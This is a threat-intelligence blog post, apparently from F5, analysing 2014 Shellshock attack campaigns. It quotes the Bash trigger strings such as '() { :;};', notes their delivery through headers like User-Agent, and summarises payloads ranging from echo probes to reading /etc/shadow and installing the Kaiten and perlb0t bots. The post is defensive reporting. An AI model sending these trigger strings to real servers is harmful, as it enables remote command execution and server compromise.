Attack Campaign
October 10, 2014

Shellshock: Malicious Bash, Obfuscated perlb0t, Echo Probes, and More

2 min. read
By Maxim Zavodchik, Oz Elisyan


Shellshock can take advantage of HTTP headers as well as other mechanisms to enable unauthorized access to the underlying system shell, Bash. The Shellshock attack takes advantage of a flaw in Bash that enables attackers to execute remote commands that would ordinarily be blocked. It's been rated the highest risk possible because remote command execution is potentially very, very dangerous.

Once the "Shellshock" vulnerability opened the door to run arbitrary commands on any CGI server out there, different entities tried to realize their diverse intentions.

The magic string which opened this door in almost all the cases was the:

() { :;};

A variation of this was entering a single word within the curly brackets instead of the "no operation" keyword:

() { foo;};

In some very rare cases it might look like this:

() {echo "Hello World";};

Although the exploit may be delivered in different HTTP headers (the ones the CGI is converting to the environment variables), "User-Agent" is used in most of the cases.

From our observations, the payload that is delivered (the actual commands that are executed) once the vulnerability is exploited has several intentions. The simplest are the "echo" probes, just sending a vector containing a certain string and expecting to see it in server's response, or the "ping back" probes, injecting ping command and expecting to see the server pinging them. Usually, these are the scanners indexing the vulnerable servers out there. Others send shell commands, mostly for information gathering, such as "uname" or "id" commands, while there might be more aggressive vectors reading sensitive files, such as "/etc/shadow" or creating dummy files on the file system.

However, the most severe threats are those which open a back door or completely compromise the server. Those attacks have a very familiar payload fingerprint. These are the same cyber-criminals who are constantly running their operations on the web, hunting for vulnerable webservers, and the "Shellshock" is a fresh opportunity to expand their army of zombie machines.

These serious exploits usually deploy the "Kaiten" (AKA "Tsunami") bot or variations of the "perlb0t" making it part of a DDoS business scheme.

To see the full version of this report, click "Download" below.



Expertly picked stories on threat intelligence

Hundreds of apps will be attacked by the time you read this.

So, we get to work. We obsess over effective attack methods. We monitor the growth of IoT and its evolving threats. We dive deep into the latest crypto-mining campaigns. We analyze banking Trojan targets. We dissect exploits. We hunt for the latest malware. And then our team of experts share it all with you. For more than 20 years, F5 has been leading the app delivery space. With our experience, we are passionate about educating the security community-providing the intel you need to stay informed so your apps can stay safe.


9 hrs

a critical vulnerability—with the potential for remote code execution—is released.